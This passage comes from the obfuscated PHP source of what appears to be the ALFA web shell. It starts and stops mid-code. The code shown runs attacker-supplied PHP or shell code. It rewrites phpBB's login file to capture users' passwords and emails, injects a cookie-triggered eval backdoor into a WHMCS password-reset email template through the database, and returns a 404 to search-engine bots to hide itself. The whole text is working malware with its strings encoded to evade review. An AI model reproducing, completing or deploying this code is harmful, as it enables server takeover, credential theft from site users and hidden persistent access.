preg_replace("\41\50\x62\x6f\x64\x79\174\x61\72\134\167\x2b\174\x62\x6f\144\x79\x2c\x20\x74\144\54\40\164\150\x2c\x20\x68\61\54\x20\x68\62\51\x20\x7b\x2e\52\x7d\x21\155\163\x69\x55", '', $tmp); $tmp = preg_replace("\41\x74\144\x2c\x20\164\150\x20\x7b\x28\x2e\x2a\51\175\41\x6d\x73\x69\125", "\56\x65\x2c\x20\x2e\166\54\40\x2e\150\54\40\56\150\40\x74\150\x20\x7b\44\61\175", $tmp); echo str_replace("\74\x68\61", "\74\x68\62", $tmp) . "\x3c\x2f\144\x69\166\x3e\x3c\x62\x72\x3e"; } if (isset($_POST["\141\154\x66\141\x32"]) && $_POST["\x61\154\x66\141\x32"] == "\145\170\x74\x65\156") { echo "\x3c\x64\x69\166\40\143\154\141\163\x73\x3d\150\145\x61\144\145\x72\76"; ob_start(); $EXT = get_loaded_extensions(); echo "\x3c\164\141\x62\154\145\40\x62\x6f\x72\x64\x65\x72\x3d\x30\x3e\x3c\x74\162\x3e\x3c\164\144\40\143\x6c\x61\163\163\75\42\x6c\x69\163\x74\x69\x6e\147\42\76" . implode("\74\57\x74\144\76\74\x2f\x74\162\x3e" . "\12" . "\x3c\164\x72\76\x3c\x74\x64\x20\x63\x6c\141\163\x73\75\x22\x6c\151\x73\x74\x69\156\147\x22\76", $EXT) . "\x3c\57\164\144\76\x3c\x2f\164\x72\76\74\x2f\x74\141\142\x6c\145\x3e" . count($EXT) . "\x20\145\170\164\x65\156\163\151\157\156\x73\x20\154\157\x61\144\145\x64"; echo "\74\x2f\144\151\166\x3e\74\x62\162\x3e"; } $lang_html = ''; foreach (array("\160\x68\160" => "\x70\150\x70\x20\176\x3e\x20\133\x20\x57\x69\x6e\x64\x6f\167\163\x20\57\x20\114\x69\156\x75\170\x20\x5d", "\x70\145\x72\x6c" => "\160\145\x72\154\40\x7e\x3e\40\133\x20\x4c\151\156\165\170\40\135", "\160\171\x74\150\x6f\156" => "\x70\171\164\x68\x6f\156\40\x7e\76\x20\x5b\x20\x4c\151\x6e\x75\170\40\135", "\x62\141\163\x68" => "\142\x61\x73\x68\40\x7e\76\40\133\40\x4c\151\156\165\170\40\135") as $key => $val) { $lang_html .= "\x3c\x6f\160\x74\151\157\x6e\x20\x76\x61\x6c\x75\x65\75\x22" . $key . "\x22\x20" . ($_POST["\141\x6c\146\141\63"] == $key ? "\163\x65\x6c\x65\143\164\145\x64" : '') . "\76" . $val . "\x3c\57\x6f\x70\164\x69\x6f\x6e\76"; } echo "\x3c\144\x69\166\x20\143\154\x61\x73\163\75\150\145\141\144\145\162\x3e\74\x43\145\x6e\164\x65\162\x3e\x3c\x61\x20\150\x72\x65\146\75\x6a\x61\166\141\163\143\162\151\x70\x74\72\x76\x6f\x69\144\x28\60\51\x20\157\x6e\x63\154\x69\x63\153\75\42\x67\50\47\160\x68\160\x65\x76\x61\x6c\x27\54\156\165\154\154\54\x27\x27\x2c\x27\x69\x6e\x69\47\51\42\x3e\174\x20\111\x4e\111\137\111\116\x46\x4f\x20\174\x20\x3c\57\141\76\74\x61\40\x68\x72\145\146\x3d\152\141\x76\141\163\143\x72\151\x70\x74\x3a\x76\x6f\x69\x64\50\x30\x29\x20\x6f\x6e\143\154\x69\143\153\x3d\x22\147\x28\47\x70\150\160\x65\x76\x61\154\x27\54\156\165\x6c\x6c\x2c\47\47\54\x27\151\x6e\146\x6f\47\x29\42\x3e\x20\x7c\40\x70\x68\160\x69\156\x66\x6f\40\x7c\74\57\141\76\74\141\40\x68\162\x65\146\75\152\141\166\x61\163\143\x72\151\x70\x74\72\166\157\151\144\x28\x30\x29\x20\157\156\143\154\151\143\x6b\x3d\42\x67\x28\x27\160\x68\160\x65\x76\141\x6c\x27\54\156\165\x6c\x6c\x2c\47\x27\54\47\x65\x78\x74\x65\x6e\47\x29\x22\x3e\40\x7c\x20\x65\170\164\145\156\x73\151\157\x6e\x73\40\174\x3c\57\141\x3e\74\57\143\145\156\x74\145\162\76\x3c\x62\x72\76\x3c\146\157\x72\155\x20\143\x6c\x61\163\x73\x3d\x22\x70\150\x70\x2d\x65\166\x61\154\163\42\x20\x6e\141\x6d\145\x3d\42\160\146\42\x20\x6d\145\164\150\x6f\x64\x3d\x22\x70\157\163\x74\42\x20\157\156\163\165\142\155\x69\x74\75\x22\166\141\162\x20\x61\143\x65\137\166\x61\x6c\165\145\x3d\147\145\x45\x76\x61\154\101\143\x65\126\141\154\x75\145\x28\164\x68\151\x73\x29\73\x67\50\47\160\x68\x70\x65\166\141\x6c\47\54\156\165\x6c\154\54\141\143\x65\x5f\166\141\x6c\x75\145\x2c\x6e\x75\x6c\x6c\54\x74\150\151\x73\56\x6c\x61\x6e\147\x75\141\147\x65\x2e\166\x61\x6c\165\145\x29\x3b\40\x72\145\x74\165\x72\156\x20\x66\141\154\163\x65\73\42\x3e\74\x64\151\166\x20\143\154\141\163\163\75\42\164\x78\164\x66\x6f\x6e\164\42\x3e\123\145\x6c\145\x63\x74\x20\x4c\141\156\147\165\x61\x67\x65\x3a\40\x3c\57\144\x69\166\x3e\x20\74\x73\145\x6c\145\143\x74\40\156\141\155\145\75\42\x6c\x61\156\x67\165\141\x67\x65\42\x20\x73\164\x79\154\x65\x3d\x22\167\151\144\x74\150\x3a\63\60\60\x70\170\73\x22\x3e" . $lang_html . "\x3c\x2f\163\145\x6c\x65\x63\164\x3e" . _alfa_load_ace_options("\145\166\x61\x6c") . "\x3c\142\162\x3e\x3c\142\x72\x3e\74\x64\151\166\40\143\154\141\x73\x73\75\42\142\151\147\141\x72\145\141\x22\x20\x73\x74\171\x6c\145\75\x22\x70\x6f\x73\x69\x74\151\x6f\156\72\x72\x65\x6c\141\x74\151\166\145\x3b\x22\x3e\74\x64\x69\x76\x20\143\x6c\x61\163\x73\75\x22\x70\x68\x70\x2d\145\x76\x61\x6c\x73\55\x61\x63\x65\42\x3e" . (!empty($_POST["\x61\x6c\146\x61\61"]) ? htmlspecialchars($_POST["\141\154\146\141\x31"]) : "\46\x6c\x74\73\77\160\x68\160\12\xa\11\x65\143\x68\157\50\x27\x68\x65\154\x6c\157\x20\x61\x6c\146\141\x20\41\x27\x29\73\12\12\77\76") . "\74\57\x64\151\x76\76\x3c\x2f\x64\151\x76\x3e\x3c\143\145\156\164\x65\x72\76\x3c\x69\156\160\165\164\40\164\171\x70\x65\x3d\42\x73\165\142\155\x69\164\x22\40\166\141\154\x75\145\75\x22\x22\40\163\x74\171\154\x65\75\42\155\x61\x72\147\151\x6e\x2d\164\157\160\x3a\65\x70\x78\42\x3e\x3c\x2f\143\145\x6e\x74\145\162\76"; echo "\74\57\x66\x6f\x72\x6d\x3e\x3c\160\x72\145\40\151\144\x3d\42\120\150\x70\117\x75\164\x70\x75\164\42\40\x73\164\x79\x6c\x65\75\x22" . (empty($_POST["\x61\x6c\146\x61\x31"]) ? "\x64\151\x73\160\x6c\141\171\72\x6e\157\x6e\145\x3b" : '') . "\155\x61\x72\147\x69\x6e\55\164\157\x70\72\65\x70\x78\x3b\42\x20\x63\154\141\163\x73\75\42\155\154\x31\42\76"; if (!empty($_POST["\141\154\x66\141\61"])) { if ($_POST["\x61\x6c\146\x61\63"] == "\x70\150\x70") { ob_start(); eval("\77\76" . $_POST["\x61\154\146\141\61"]); $result = htmlspecialchars(ob_get_clean()); } elseif (_alfa_can_runCommand() && $GLOBALS["\x73\x79\x73"] == "\165\156\151\x78") { $lang = $_POST["\x61\154\x66\141\x33"]; $filename = "\164\145\155\x70" . rand(11111, 99999); $temp = $tempdir . "\x2f" . $filename; __write_file($filename, $_POST["\x61\x6c\x66\141\61"]); $result = alfaEx("\x6d\x76\40{$filename}\x20{$temp}\x3b{$lang}\40{$temp}\73\162\x6d\40\x2d\146\x20{$temp}"); @unlink($filename); @unlink($temp); } echo "\x3c\164\x65\170\x74\141\x72\145\x61\x20\x63\x6c\141\163\x73\75\42\142\151\147\x61\162\x65\x61\x22\76" . $result . "\x3c\57\164\145\x78\x74\141\162\145\x61\76"; } echo "\74\x2f\160\x72\145\76\x3c\x2f\x64\151\x76\x3e"; alfafooter(); } goto GzP8G; qyg4S: define("\x5f\x5f\x41\x4c\106\x41\137\x56\105\x52\123\x49\117\116\137\x5f", "\64\56\x31"); goto w9Wdo; tOoun: function hijackPHPBB($path, $saveto) { $code = "\44\x41\154\146\x61\x5f\x75\x20\75\40\162\x65\161\165\x65\163\164\x5f\166\141\162\x28\47\165\163\x65\x72\x6e\x61\x6d\x65\47\x2c\x20\47\47\51\x3b\44\x41\x6c\x66\x61\x5f\x70\40\x3d\40\x72\145\x71\x75\x65\163\164\137\x76\x61\x72\x28\47\x70\141\163\x73\x77\x6f\162\x64\47\x2c\x20\47\x27\x29\73\151\146\50\x24\x41\x6c\x66\141\x5f\x75\40\41\75\40\x27\x27\40\x41\x4e\x44\40\44\101\x6c\146\x61\x5f\160\x20\41\75\x20\x27\47\x29\173\x24\101\x6c\x66\x61\x5f\x72\145\x73\160\157\x6e\163\x65\40\75\40\x24\x61\165\x74\150\x2d\x3e\154\157\147\x69\x6e\50\44\101\154\x66\x61\137\165\x2c\44\x41\x6c\146\141\x5f\x70\x29\x3b\x69\x66\50\44\x41\x6c\x66\x61\137\x72\145\163\x70\x6f\156\x73\145\133\47\163\x74\141\x74\x75\x73\x27\x5d\x20\x3d\75\40\x4c\x4f\107\x49\116\x5f\x53\125\103\x43\x45\x53\123\x29\173\44\x41\x6c\x66\x61\x5f\x66\x69\x6c\145\x20\x3d\x22\x7b\163\141\x76\145\164\x6f\137\160\x61\x74\150\175\42\73\44\146\x70\x20\75\x20\100\x66\157\x70\x65\156\x28\44\101\154\146\141\137\146\x69\x6c\x65\x2c\40\x22\x61\53\x22\51\x3b\100\146\x77\x72\x69\164\x65\x28\x24\146\160\x2c\x20\x24\101\154\x66\141\137\x75\56\42\x20\72\x20\42\x2e\x24\x41\x6c\x66\x61\137\x70\x2e\40\x22\x20\50\x20\42\x2e\44\101\x6c\146\141\137\162\145\163\x70\157\x6e\x73\145\133\x27\165\163\x65\x72\137\x72\157\x77\47\x5d\133\47\x75\163\145\162\137\x65\155\x61\151\154\47\x5d\56\x22\40\51\134\156\x22\51\73\100\146\143\154\x6f\163\x65\50\x24\x66\x70\51\x3b\44\x66\x20\75\x20\100\146\151\154\145\50\44\101\154\146\141\x5f\x66\x69\x6c\x65\51\73\44\x6e\x65\167\x20\x3d\x20\x61\162\x72\x61\171\x5f\165\x6e\151\x71\x75\x65\50\x24\x66\x29\x3b\44\146\x70\40\75\x20\100\x66\x6f\x70\x65\x6e\50\x24\x41\x6c\x66\141\x5f\x66\151\154\145\x2c\40\x22\x77\42\x29\x3b\x66\x6f\162\x65\141\x63\150\x28\x24\x6e\x65\x77\40\x61\163\x20\x24\166\141\x6c\x75\145\163\51\x7b\100\146\x70\165\164\x73\x28\x24\146\x70\x2c\40\44\x76\x61\x6c\x75\145\x73\x29\x3b\x7d\x40\146\143\x6c\x6f\163\x65\50\x24\x66\x70\x29\x3b\x7d\175"; $find = "\143\141\163\x65\x20\x27\154\x6f\x67\x69\156\47\x3a"; $code = str_replace("\173\163\x61\x76\x65\x74\x6f\x5f\x70\x61\x74\x68\175", $saveto, $code); $login = $path . "\57\x75\x63\160\x2e\160\x68\160"; $evil_login = "\x9" . $find . "\12\x9" . $code; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto wK3Iv; HZNvy: function _alfa_is_dir($dir, $mode = "\x2d\x64") { $check = false; $check = @is_dir($dir); if ($mode == "\x2d\145") { $check = @is_file($dir); } if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("\x5b\40\x22" . trim($mode) . "\x22\40\x22" . trim(addslashes($dir)) . "\42\x20\x5d\x20\46\x26\40\x65\143\150\157\x20\x22\171\145\163\42\40\174\x7c\40\145\x63\x68\x6f\40\42\x6e\x6f\x22"); if ($check == "\171\145\163") { return true; } else { return false; } } } return $check; } goto DpoiO; yJd4z: if (!empty($_SERVER["\110\124\124\x50\137\125\x53\105\x52\137\101\107\105\x4e\x54"])) { $userAgents = array("\107\157\x6f\147\x6c\x65", "\123\x6c\165\x72\160", "\x4d\x53\116\102\x6f\164", "\151\141\137\141\162\143\150\x69\x76\x65\x72", "\131\x61\156\144\145\170", "\122\x61\x6d\142\154\x65\162", "\142\x6f\164", "\x73\160\x69\x64\145\x72"); if (preg_match("\57" . implode("\x7c", $userAgents) . "\57\151", $_SERVER["\x48\x54\124\x50\x5f\x55\123\105\122\137\x41\107\x45\x4e\x54"])) { header("\x48\x54\x54\x50\57\x31\x2e\x30\x20\x34\x30\x34\x20\116\x6f\164\x20\106\157\x75\156\x64"); die; } } goto KS5YC; Qm0Jb: if (isset($_POST["\x63"])) { if (!@chdir($_POST["\143"])) { $GLOBALS["\147\x6c\157\142\137\x63\150\x64\151\x72\x5f\146\x61\x6c\163\x65"] = true; } } goto EZmej; Hq5LP: function alfaShellInjectors() { alfahead(); echo "\74\144\151\166\40\x63\154\x61\x73\x73\75\150\x65\x61\x64\145\162\x3e"; AlfaNum(11); echo "\74\143\145\x6e\x74\x65\162\x3e\74\160\76\x3c\x64\x69\x76\40\143\154\141\163\x73\75\x22\164\x78\164\146\157\156\164\x5f\150\x65\141\x64\145\162\42\76\174\40\x43\x6d\163\40\123\150\x65\x6c\154\x20\x49\x6e\x6a\x65\x63\x74\157\x72\40\174\74\57\144\x69\x76\76\x3c\57\x70\x3e\x3c\x63\x65\156\164\145\x72\x3e\x3c\x68\63\x3e\x3c\x61\40\150\x72\145\x66\75\152\141\166\x61\x73\x63\x72\151\160\x74\72\166\x6f\151\x64\50\60\51\x20\157\156\x63\x6c\151\x63\x6b\x3d\x22\x67\x28\x27\x53\150\145\154\154\x49\156\152\145\143\164\x6f\x72\x73\x27\x2c\x6e\165\x6c\x6c\54\47\167\x68\155\143\x73\47\54\156\165\154\154\51\42\x3e\174\40\127\x48\x4d\103\123\40\x7c\40\74\x2f\141\x3e\x3c\141\40\x68\x72\145\x66\x3d\152\141\166\141\x73\x63\x72\x69\x70\164\72\166\x6f\x69\144\x28\60\x29\x20\x6f\x6e\143\154\x69\x63\x6b\x3d\x22\x67\x28\47\x53\150\145\154\154\x49\156\152\145\x63\164\x6f\162\163\x27\54\156\x75\154\154\x2c\156\165\x6c\x6c\x2c\47\155\x79\142\x62\x27\x29\x22\76\174\40\115\x79\x42\x42\40\174\40\x3c\x2f\141\x3e\74\x61\40\x68\x72\145\x66\75\x6a\x61\166\141\163\143\x72\151\x70\164\72\166\x6f\x69\144\50\x30\x29\x20\157\156\x63\x6c\x69\143\153\x3d\x22\x67\x28\x27\123\150\145\x6c\x6c\111\x6e\152\x65\143\164\157\162\163\x27\54\x6e\x75\154\154\54\156\165\154\x6c\x2c\156\165\x6c\x6c\x2c\x27\x76\x62\47\x29\42\76\174\40\x76\x42\x75\x6c\154\145\164\x69\156\x20\174\74\57\x61\x3e\74\x2f\x68\x33\76\x3c\x2f\143\x65\156\164\145\x72\x3e"; $selector = "\x3c\160\x3e\74\x64\151\166\x20\143\x6c\141\163\x73\75\x22\x74\x78\x74\x66\157\156\164\42\x3e\123\150\x65\x6c\154\40\x49\156\152\x65\143\164\x20\x4d\x65\164\150\x6f\144\x20\72\40\74\x2f\x64\151\x76\x3e\x20\x3c\163\x65\x6c\145\x63\164\x20\156\x61\x6d\x65\x3d\x22\x6d\145\164\150\157\x64\x22\x20\163\x74\x79\x6c\x65\x3d\42\x77\x69\x64\x74\x68\x3a\x31\60\x30\160\x78\73\42\76\x3c\157\x70\x74\151\x6f\x6e\40\166\141\154\x75\x65\75\x22\141\x75\x74\x6f\42\76\101\x75\x74\x6f\x4d\x61\164\x69\143\x3c\x2f\x6f\x70\164\x69\157\156\x3e\74\157\160\164\x69\157\156\40\x76\x61\154\x75\x65\x3d\42\x6d\141\x6e\x22\76\x4d\141\156\x75\145\154\x3c\57\157\160\164\x69\157\x6e\76\74\x2f\x73\145\154\145\x63\x74\x3e\x3c\x2f\160\76"; if (isset($_POST["\x61\154\x66\141\x31"]) && $_POST["\141\x6c\x66\141\x31"] == "\167\150\x6d\143\163") { AlfaNum(); echo __pre() . "\x3c\160\76\x3c\144\x69\166\x20\x63\x6c\141\163\163\75\x27\164\170\x74\x66\x6f\x6e\x74\x5f\150\x65\x61\x64\x65\162\47\x3e\x7c\x20\x57\x48\115\x43\123\x20\174\74\57\144\151\166\76\x3c\x2f\x70\76\74\x63\145\x6e\x74\145\x72\76\x3c\143\x65\156\164\145\162\76\74\160\x3e" . getConfigHtml("\167\x68\x6d\143\163") . "\74\57\160\76\74\x66\157\162\x6d\x20\x6f\156\123\165\142\x6d\151\164\x3d\42\147\50\x27\x53\150\145\154\154\x49\156\152\x65\143\x74\157\162\163\x27\54\x6e\x75\154\154\54\x27\x77\150\155\x63\x73\47\x2c\x6e\x75\154\154\x2c\x6e\x75\x6c\x6c\x2c\x74\x68\x69\x73\56\155\145\164\x68\157\x64\56\x76\141\x6c\165\145\54\x6e\165\x6c\154\x2c\x74\150\151\163\x2e\x64\x62\x75\x2e\166\x61\x6c\x75\145\x2c\164\150\x69\x73\x2e\x64\x62\x6e\56\x76\141\x6c\165\145\x2c\164\150\x69\x73\56\x64\142\160\56\166\x61\154\165\145\x2c\164\150\151\x73\x2e\x64\142\150\x2e\x76\141\154\x75\x65\54\164\x68\151\x73\x2e\160\x61\164\x68\56\x76\141\154\x75\145\x29\73\x20\x72\145\164\x75\162\x6e\40\146\x61\x6c\163\x65\x3b\x22\x20\x6d\145\x74\x68\x6f\144\75\x27\160\157\163\x74\47\x3e"; $table = array("\x74\x64\x31" => array("\143\157\154\x6f\x72" => "\x46\x46\106\x46\106\106", "\x74\x64\x4e\x61\x6d\x65" => "\120\x61\164\150\40\x57\110\115\x43\x53\x20\x55\162\154\x20\72\x20", "\x69\156\160\x75\164\x4e\x61\x6d\x65" => "\160\141\x74\x68", "\x69\156\x70\x75\x74\126\x61\154\165\145" => "\150\164\x74\x70\72\x2f\x2f\163\x69\x74\x65\56\x63\x6f\155\57\x77\150\x6d\143\163", "\x69\156\x70\165\164\x53\151\172\145" => "\65\x30"), "\164\144\x32" => array("\143\x6f\154\157\162" => "\106\x46\106\106\106\x46", "\x74\x64\116\141\x6d\145" => "\115\171\163\161\x6c\40\110\157\163\x74\40\x3a\40", "\151\x6e\160\165\164\x4e\x61\155\x65" => "\144\x62\150", "\x69\x64" => "\x64\142\137\x68\x6f\x73\164", "\151\156\160\x75\x74\126\x61\154\x75\x65" => "\x6c\157\x63\141\x6c\x68\x6f\x73\164", "\151\x6e\160\x75\x74\123\x69\172\x65" => "\65\x30"), "\x74\x64\63" => array("\x63\157\x6c\x6f\x72" => "\106\x46\x46\106\x46\x46", "\164\144\116\141\x6d\145" => "\x44\142\x20\116\x61\155\145\40\x3a\x20", "\x69\156\x70\x75\x74\116\141\x6d\145" => "\144\x62\x6e", "\151\144" => "\144\x62\x5f\156\141\x6d\x65", "\x69\156\x70\x75\164\x56\x61\154\165\145" => '', "\x69\156\x70\x75\x74\123\151\172\x65" => "\65\60"), "\x74\144\64" => array("\x63\x6f\154\157\x72" => "\x46\x46\106\x46\106\106", "\164\144\x4e\x61\x6d\145" => "\x44\142\x20\125\163\x65\162\40\72\x20", "\x69\x6e\x70\x75\164\x4e\x61\155\x65" => "\x64\x62\165", "\x69\144" => "\144\x62\x5f\165\163\145\x72", "\x69\156\x70\x75\164\x56\141\154\165\145" => '', "\151\x6e\160\165\x74\123\151\x7a\145" => "\65\60"), "\x74\x64\65" => array("\x63\x6f\x6c\157\162" => "\x46\x46\x46\x46\106\106", "\x74\144\116\x61\155\x65" => "\x44\142\x20\x50\141\x73\x73\40\x3a\x20", "\x69\156\x70\x75\x74\x4e\x61\155\145" => "\144\x62\160", "\x69\x64" => "\x64\142\137\160\167", "\x69\x6e\x70\165\x74\126\141\x6c\x75\145" => '', "\151\156\x70\x75\x74\x53\151\x7a\145" => "\x35\60")); create_table($table); echo $selector; echo "\74\x70\76\74\x69\x6e\160\165\164\40\x74\171\160\x65\x3d\47\x73\x75\x62\x6d\x69\x74\47\x20\166\141\154\165\145\75\47\x20\47\76\74\x2f\160\x3e\74\57\x66\x6f\x72\x6d\x3e\x3c\57\x63\145\x6e\164\x65\x72\x3e\x3c\57\164\x64\76\74\x2f\x74\x72\76\x3c\x2f\164\x61\x62\154\x65\x3e\x3c\x2f\143\x65\x6e\x74\x65\162\x3e"; if (isset($_POST["\x61\154\146\x61\66"])) { $dbu = $_POST["\141\154\146\x61\x36"]; $dbn = $_POST["\x61\x6c\x66\141\67"]; $dbp = $_POST["\141\154\x66\141\70"]; $dbh = $_POST["\141\154\x66\x61\71"]; $path = $_POST["\141\x6c\x66\x61\61\60"]; $method = $_POST["\x61\x6c\x66\141\64"]; $index = "\x7b\x70\x68\160\x7d" . ALFA_UPLOADER . "\73\x7b\x2f\160\150\x70\175"; $newin = str_replace("\47", "\134\x27", $index); $newindex = "\x3c\160\x3e\x44\x65\x61\162\x20{$newin}\54\74\x2f\x70\x3e\74\160\76\x52\x65\143\x65\156\164\154\x79\40\141\x20\x72\145\x71\165\x65\x73\x74\x20\167\x61\163\x20\163\x75\x62\155\151\x74\x74\x65\144\40\164\157\40\x72\145\163\145\x74\x20\171\157\165\x72\x20\160\x61\163\163\x77\x6f\x72\144\40\x66\x6f\x72\40\157\165\162\x20\x63\154\x69\145\156\164\x20\x61\x72\x65\x61\x2e\x20\111\x66\x20\x79\157\165\40\x64\x69\x64\40\156\157\x74\x20\162\145\161\x75\145\x73\164\x20\x74\x68\x69\x73\54\40\160\x6c\145\x61\x73\145\x20\151\147\156\157\x72\x65\40\x74\x68\151\x73\x20\x65\155\141\151\x6c\56\x20\x49\164\x20\167\x69\154\x6c\40\x65\x78\x70\x69\x72\145\40\x61\x6e\144\40\142\x65\143\157\x6d\x65\40\165\163\x65\x6c\x65\x73\163\x20\151\x6e\x20\x32\x20\x68\x6f\165\162\x73\40\x74\151\155\x65\x2e\74\57\x70\76\74\160\76\124\x6f\40\x72\145\x73\x65\164\x20\x79\157\x75\162\40\160\x61\163\163\x77\x6f\162\144\54\x20\160\x6c\x65\141\163\x65\x20\166\151\163\x69\x74\40\x74\150\x65\x20\x75\162\x6c\40\x62\145\x6c\x6f\167\x3a\74\x62\162\x20\x2f\76\74\141\x20\x68\162\x65\x66\75\x22\173\44\160\167\137\x72\145\163\145\x74\x5f\165\162\154\175\x22\x3e\173\x24\x70\167\x5f\162\x65\163\x65\164\x5f\x75\x72\154\175\74\x2f\x61\76\x3c\x2f\x70\x3e\x3c\x70\76\x57\x68\x65\156\40\x79\x6f\x75\40\x76\151\163\151\164\40\164\x68\x65\40\x6c\x69\x6e\x6b\40\141\142\x6f\166\145\x2c\40\171\157\165\162\40\160\x61\x73\163\167\x6f\x72\144\x20\167\151\154\154\x20\142\x65\x20\x72\x65\163\145\164\x2c\40\x61\x6e\144\40\x74\x68\145\x20\156\145\x77\x20\x70\141\163\x73\x77\x6f\x72\144\40\167\151\x6c\x6c\40\x62\x65\x20\145\x6d\141\151\x6c\145\x64\40\x74\x6f\40\x79\x6f\165\56\x3c\x2f\x70\x3e\x3c\x70\x3e\173\44\x73\151\147\x6e\141\x74\165\x72\145\175\74\57\x70\x3e\173\160\150\160\175\x69\x66\50\44\x5f\x43\x4f\x4f\x4b\111\105\x5b\x22\163\145\x63\x22\x5d\x20\x3d\x3d\40\42\61\x32\63\x22\51\x7b\x65\166\141\x6c\x28\x62\141\163\x65\x36\64\137\144\x65\143\157\144\x65\50\44\x5f\103\x4f\x4f\x4b\x49\x45\133\x22\163\145\143\62\x22\135\51\51\x3b\x20\x64\151\145\x28\42\41\42\51\73\175\x7b\134\57\x70\x68\160\175"; if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { if (filter_var($path, FILTER_VALIDATE_URL)) { $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_connect_error()); $soleSave = mysqli_query($conn, "\x73\x65\x6c\x65\143\x74\x20\155\x65\163\163\x61\x67\145\x20\x66\x72\x6f\x6d\40\x74\x62\x6c\x65\155\x61\151\154\164\145\155\160\154\141\x74\x65\x73\x20\x77\150\145\162\x65\40\x6e\x61\155\x65\75\47\x50\x61\163\x73\x77\157\x72\144\x20\122\145\163\x65\x74\x20\126\141\x6c\151\144\141\x74\x69\157\x6e\47"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet["\x6d\145\163\x73\x61\147\x65"]; $tempSave = str_replace("\x27", "\x5c\47", $tempSave1); mysqli_query($conn, "\x55\120\104\x41\x54\105\40\164\142\154\143\x6f\x6e\x66\151\x67\x75\x72\x61\x74\x69\157\156\40\123\105\x54\x20\166\x61\154\x75\145\40\75\40\x27\x31\x27\40\127\110\x45\122\x45\40\x73\x65\x74\x74\151\156\147\40\75\40\x27\x41\154\x6c\157\167\x53\155\x61\162\164\x79\x50\x68\160\x54\x61\x67\163\47") or die(mysqli_error($conn)); $inject = "\x55\120\x44\101\x54\x45\x20\164\142\154\x65\x6d\141\151\x6c\x74\145\155\x70\154\x61\x74\x65\x73\40\123\105\x54\40\155\x65\x73\x73\141\x67\145\75\x27{$newindex}\47\40\x57\x48\105\122\x45\40\x6e\x61\155\x65\75\x27\120\x61\163\x73\167\x6f\162\x64\40\x52\x65\163\145\164\x20\x56\141\x6c\151\144\x61\x74\151\x6f\156\x27"; $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $create = "\151\x6e\x73\x65\162\x74\40\x69\x6e\x74\x6f\x20\x74\x62\x6c\143\154\x69\145\156\x74\163\40\x28\x65\x6d\141\151\154\51\x20\x76\141\x6c\165\145\x73\x28\47\163\x6f\x6c\145\166\151\x73\x69\x62\154\145\x40\146\142\x69\56\147\157\x76\x27\51"; $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn)); if (function_exists("\x63\165\x72\154\137\x76\145\x72\x73\x69\157\156") && $method == "\141\x75\x74\157") { $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path . "\57\x70\167\x72\145\x73\145\164\56\x70\x68\160"); $getToken = preg_match("\57\x6e\x61\x6d\x65\x3d\x22\164\x6f\x6b\x65\x6e\x22\40\x76\141\x6c\165\145\75\x22\50\56\52\x3f\x29\x22\x2f\x69", $saveurl, $token); $AlfaSole->Send($path . "\57\160\167\162\x65\163\145\164\56\x70\150\160", "\x70\157\x73\164", "\x74\157\x6b\145\156\75{$token[1]}\46\x61\143\164\x69\157\156\x3d\162\145\x73\x65\x74\46\145\155\141\x69\154\75\x73\x6f\x6c\x65\166\x69\x73\x69\142\x6c\x65\100\146\x62\151\56\x67\x6f\x76"); $backdata = "\x55\x50\x44\x41\124\105\40\x74\142\x6c\x65\x6d\x61\151\154\x74\x65\155\x70\154\x61\x74\x65\x73\x20\x53\105\x54\40\x6d\145\163\x73\x61\147\x65\75\x27{$tempSave}\47\40\127\x48\105\x52\x45\40\x6e\x61\x6d\x65\75\47\120\x61\163\x73\167\x6f\162\144\40\x52\145\163\x65\164\40\126\x61\x6c\151\x64\141\x74\x69\157\x6e\x27"; $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn)); __alert("\163\x68\x65\x6c\154\x20\151\156\152\145\x63\x74\x65\x74\x2e\56\x2e"); $ff = "\150\164\164\160\72\57\x2f" . $path . "\57\163\157\x6c\145\x76\x69\x73\151\x62\154\x65\x2e\x70\150\x70"; output($ff); } else { echo "\74\x62\x72\x3e\x3c\x70\x72\145\x20\151\144\x3d\x22\163\x74\162\117\x75\164\x70\x75\164\x22\x20\x73\164\171\154\145\75\x22\155\141\x72\147\151\x6e\x2d\164\157\160\72\65\160\x78\x22\x20\x63\x6c\x61\x73\163\x3d\42\155\x6c\61\x22\x3e\74\142\x72\76\74\x63\x65\x6e\164\145\x72\x3e\x3c\x62\x3e\74\146\157\156\164\x20\x63\157\154\x6f\x72\75\42\43\x46\106\106\x46\x46\106\42\76\x50\x6c\145\141\x73\145\40\147\x6f\40\164\157\40\124\141\162\x67\x65\164\40\75\76\40\74\x2f\146\x6f\156\164\76\74\141\x20\150\162\145\x66\x3d\x27" . $path . "\x2f\160\x77\162\145\x73\145\x74\x2e\x70\x68\x70\47\40\x74\x61\x72\147\145\x74\75\47\x5f\142\154\141\x6e\153\47\x3e" . $path . "\57\x70\x77\x72\145\x73\x65\x74\56\x70\x68\x70\x3c\57\x61\76\74\x62\x72\x2f\x3e\x3c\146\x6f\156\164\40\x63\x6f\x6c\157\x72\75\47\43\106\x46\x46\106\106\106\47\76\x20\x41\x6e\x64\x20\x52\x65\163\x65\164\40\x50\141\163\x73\x77\x6f\x72\144\x20\x57\x69\x74\x68\40\x45\155\x61\151\154\74\57\x66\x6f\x6e\164\76\x20\x3d\76\40\74\x66\157\156\x74\40\143\x6f\154\x6f\162\x3d\x72\x65\x64\76\x73\x6f\154\145\166\151\163\151\x62\x6c\145\x40\x66\x62\x69\x2e\x67\x6f\166\x3c\57\x66\157\x6e\x74\x3e\74\x62\162\x2f\x3e\74\146\x6f\156\164\x20\x63\x6f\x6c\x6f\x72\x3d\47\43\x46\106\x46\x46\106\x46\x27\x3e\101\x6e\x64\x20\107\157\x20\124\157\40\75\76\x20\x3c\x2f\x66\x6f\156\164\x3e\74\141\40\150\x72\x65\146\75\x27" . $path . 